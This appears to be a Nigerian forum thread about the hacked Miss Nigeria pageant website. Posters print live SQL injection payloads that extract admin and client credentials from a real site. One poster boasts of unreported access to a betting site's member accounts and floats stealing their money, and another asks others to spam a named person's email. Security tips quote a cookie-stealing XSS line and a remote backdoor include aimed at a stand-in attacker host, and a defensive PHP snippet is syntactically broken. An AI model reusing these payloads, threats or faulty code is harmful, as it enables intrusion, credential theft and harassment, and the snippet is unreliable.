I discovered yesterday that the official website of the Miss Nigeria pageant has been hacked!

Home :: Miss Nigeria Pageant - www.missnigeriapageant.com/

This is a slap on the face of Nigerians

Thats what happens when they pick up a developer from the streets of Lagos, or someone in Computer Village.
These everybody that touches a keyboard calls himself an admin or sysadmin or whatever they call it.
It was defaced by some kid from Tunisia and hasn't even been cleared up till now. What a joke. Reading too much "for dummies" pdfs.

To think that he even configured the server to redirect all pages to the default page. Should be from .htacess or conf, if on apache. Definitely on apache. He wouldn't use RD to deface IIS.
I talk too much.

Mr. Barzini,

Of course, the key question is will they, and others learn from this and start hiring competent people/firms? Sadly, the answer to that question is "no"

Can someone pls spam the dude's email address olumartins@gmail.com with 10,000 mails?

Thanks.

This was 1st reported yesterday, and its still there. .This is sad.

What is the advantage of hacking a website?

^^^ What is the advantage of breaking into a house?

It is a shame for such things to be happening, i have try to reach the organizers of the events to no avail, i have also try to reach the webmaster that developed the website without success.

I wonder why some people will continue to drag this country name in mud, shame to some webmasters.

??

Looks like its been sorted (for now). The offending page is gone.

Damage control:
First, index.php, index.html, default.html were removed (probably by the host).
Now, the hosting account has been terminated.

My predictions as to whats next:

New hosting account will be created,
Olumartins or whoever looks at all the site files on his pc and is like. . . ah ah how did this happen, musta been a random attack or mistake. . . it wont happen again. (typical Nigerian, no offense).
Olumartins or whoever, uploads same files unto new account created and goes to sleep.
Olumartins calls owners of site. . . sir, its back up! I have fixed it!! (James Olu Bond)
Script kiddies here see the site is back and start rattling door knobs on the site to see if they can create a sequel.
Slyr0x or Number 7 "revisits" the site.
Slyr0x reports second hack 

**All names are fictional and not targeted at any real individual, if there's any coincidence. . . as you have seen: it is just coincidence.

@DC:
I truly think, based on recent posts, that you should start writing comedy scripts for nollywood LOL

Yep, unfortunately, the guy will just move from site to site, transferring domains and the hackers will follow him too.  I seriously doubt that the home page had any code that could subject the page to an attack.  I am calling out the web host on this one (I stand to be corrected)

at slyrox, Dual core and co. please tutorial on website security. its not enuff to damn them, why not help? if you can. cos this could happen to anyone that manages a high profile site. i suspect the web host too

This .htaccess may help some of us

AddType text/x-component .htc
IndexIgnore *
ErrorDocument 400 /400.php
ErrorDocument 401 /401.php
ErrorDocument 403 /403.php
ErrorDocument 404 /404.php
ErrorDocument 500 /500.php
<Files .htaccess>
order allow,deny
deny from all
</Files>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]

Help them how? Dem pay me?

We even try to tell them via NL.  They should thank God that we care.

In the future, such high profile sites should be handled by an actual firm and not, as I suspect, some guy sitting under a Mango tree, coding with lantern who happens to have been subcontracted for peanuts by a crony.

Lol yawa, but na the foreseeable future of the site be tht na.

remoranger:

at slyrox, Dual core and co. please tutorial on website security. its not enuff to damn them, why not help? if you can. cos this could happen to anyone that manages a high profile site. i suspect the web host too

Well, when I see a bad thing I do my bid to try and help. Up till this moment I still have access to all the member accounts of a Nigerian sports betting site (not saharabet.com na me build tht one, even slyr0x cant touch it  ). I have tried to contact them through all possible means, even through the email address of the admin account that i got from the site's database. As if storing passwords in clear text wasn't enough insult to web dev, a user can set member password to null and log into the site with just the username (ofcourse turning off the silly javascript password validation).

So what next should i do? Dem just dey fortunate sey i hold my side if not i for start to withdraw people money one by one.

Edit:
Thanks for the .htaccess, saving it.

When I first saw it I thoght it was the .htaccess of the site tht you pulled out. I wanted to wonder how manage!


Here's an offer for young host companies: I could harden your dedicated/VPS servers as long as they running on Linux and you have root access to it and can trust me with it. Someone gave me a new VPS he got from hostgator for me to work on and I didnt know when I told him his VPS was "embarrassingly insecure".

well. to those learning. try and encrypt your passwords, sha1 or something, so when slyrox breaks into your site, your clients may be safe. lol. and with d .htaccess above try and use your admin folder as something else, http://www.dagbo.com/xyz admin is tooooo predictable. you may laff, but u do be surprised how many serious would be hackers this would filter out. use complicated generated passwords, with symobls, uppercase letters and numbers, it may help you survive a dictionary attack, this wont necessarily stop me from hacking the daylights outta you, but at least try gaddamnit lol

Dual Core:

even slyr0x cant touch it  )

HOST/pagedetail.php?pid=2+AND+1=2+UNION+ALL+SELECT+concat%280x1e,uname,0x1e,0x3a,pass,0x1e,0x20%29,2+FROM+administrator--

Slyr0x is a beast.

Slyr0x:



HOST/pagedetail.php?pid=2+AND+1=2+UNION+ALL+SELECT+concat%280x1e,uname,0x1e,0x3a,pass,0x1e,0x20%29,2+FROM+administrator--

You may try some heads up before this kinda injections, for  a second I thought that was saharabet and  a blood vessel almost popped.
Have you by any means cracked the MD5 on that admin pass?

This gives you better juice
site/pagedetail.php?pid=44+UNION+ALL+SELECT+1,group_concat(id,username,id,password,id,email)+FROM+client

lol, i used id as the seperator couldnt figure out someting better.

What's the role of the 1e and 3a hex in your injection?

I ddnt bother myself with d pwd. .nd the hex values are just seperators.

A group know as Lulzsec has been quoted as "taking down Minecraft, EVE Online and League of Legends servers – all in a single day."
they also have Senate.gov, CIA, Nintendo.com, Fox.com, FBI's Infragard, and Sony BMG to their belt, and they even go as far as telling it on twitter "we are taking down sony right now"

common, it's easier to destroy than to build. It's left to we developers to decide which role we wanna play.
not bad if the hacker reported it to the owners.

here are some tips that may help someone
1. form the habit of escaping your sql while you code, dont leave it till the end
2. using server side includes rock, but while at it, make sure you are not passing the included URL to your script as parameters
imagine http://mysite.com?page=index.php reconstructed to http://mysite.com?page=http://hackers.com/backdoor.txt
3. use htmlentities(), it's free
especially in your admin area, where you get to read messages sent from users
u dont want to read something like this
<img src="http://hackers.com/stealSession.php?"+encodeURI(document.cookie);>
it send your admin area cookie to the hacker and you now have a new site administrator
4. use a hack like the one below

<?php
if(strpos($_SERVER['QUERY_STRING'],strtolower("+union+")!== false && strpos($_SERVER['QUERY_STRING'],strtolower(" union "!== false)){fwrite(fopen(".htaccess","a","\ndeny from ".$_SERVER['REMOTE_ADDR']);$p="";foreach($_REQUEST as $k=>$v){$p.=$k."=".$v."&";}mail("youremail@webmaster.com","hacker at work", $_SERVER['REMOTE_ADDR']."'s url:".$_SERVER['REQUEST_URI']."\nPosts:".$p);exit();}
?>

i now put the above boring code at the start of every page that does any serious stuff
it simply checks for sqli hackers favorite string, blocks the user's "current" ip address and emails you detail of what the hacker did. that will hopefully buy you time
NOTE:you may want to check for other sql syntax and add hexadecimal support to it before using it cos every hacker these days have hex tools installed.

DISCLAIMER: "dot your tee and cross your eyes" before attemping to use my code, the above is for educational purpose only and could make a hacker see you as a challenge and focus all attention on you. You sorryaass may be sorry.

"hacker at work" 
That's too serious joor and its also life threatening if you are hypertensive. Imagine waking up in the middle of the night (if you sleep at night) to see the red light on your BB and its "hacker at work". 

Change the mail subject to "dem don come o!" then echo "your fada!" D

How Secured Are Your Websites/ Web Applications?

It has been garnered over time that more than 75% of all vulnerabilities discovered are at the application layer. And our experience shows that nine out of ten customers have at least one serious hole that could lead to customer data disclosure or total system compromise.

[list]
[li] In an online banking application, can an adversary siphon off funds?[/li]

[li] In an insurance application, can an adversary modify the terms of a user's policy?[/li]

[li] In a healthcare application, can an adversary change the prescription for a patient?[/li]

[li] In a school records application, can an attacker modify a Student's record?[/li]

[/list]

All these are put into consideration as Phynxlabs Penetration Testing services looks at a web site from the perspective of a malicious hacker and finds the holes before they can be exploited in real time.

There are other firms who offer application security testing, we try to be better, faster and cheaper.

Check site for more info - http://www.phynxlabs.com

u can use online tools for penetration testing and security analysis. e.g

http://www.unmaskparasites.com or download from hp https://download.spidynamics.com/webinspect/default.htm


google for the rest, lol. una nor dey pay me

Silly people, they will never learn. Security is fundamental!

I said it before and I'm saying it again. . . . There will be war on the cyberspace!

Now, the buzz word in corporate environments is Cloud! I foresee war!

Slyrox don't hack me oh, I have samurai sword.

@slyrox, shey na u be d badt guy? ehn? oya, i am the webmaster of http://www.twitter.com, hack me if you can. lol

At 1st, it was hacked by Number 7 (pic 1), the host got contacted, the hacked page was removed. .

Now its been hacked again by a supposed Islam patriot.

The Islam song playing sounds like all those Indian movie songs

Images below

shocking

Yawa

Dual Core:

Damage control:
First, index.php, index.html, default.html were removed (probably by the host).
Now, the hosting account has been terminated.

My predictions as to whats next:

New hosting account will be created,
Olumartins or whoever looks at all the site files on his pc and is like. . . ah ah how did this happen, musta been a random attack or mistake. . . it wont happen again. (typical Nigerian, no offense).
Olumartins or whoever, uploads same files unto new account created and goes to sleep.
Olumartins calls owners of site. . . sir, its back up! I have fixed it!! (James Olu Bond)
Script kiddies here see the site is back and start rattling door knobs on the site to see if they can create a sequel.
Slyr0x or Number 7 "revisits" the site.
Slyr0x reports second hack 

**All names are fictional and not targeted at any real individual, if there's any coincidence. . . as you have seen: it is just coincidence.

Just what you predicted. .except this time around, twas sacker-boy :p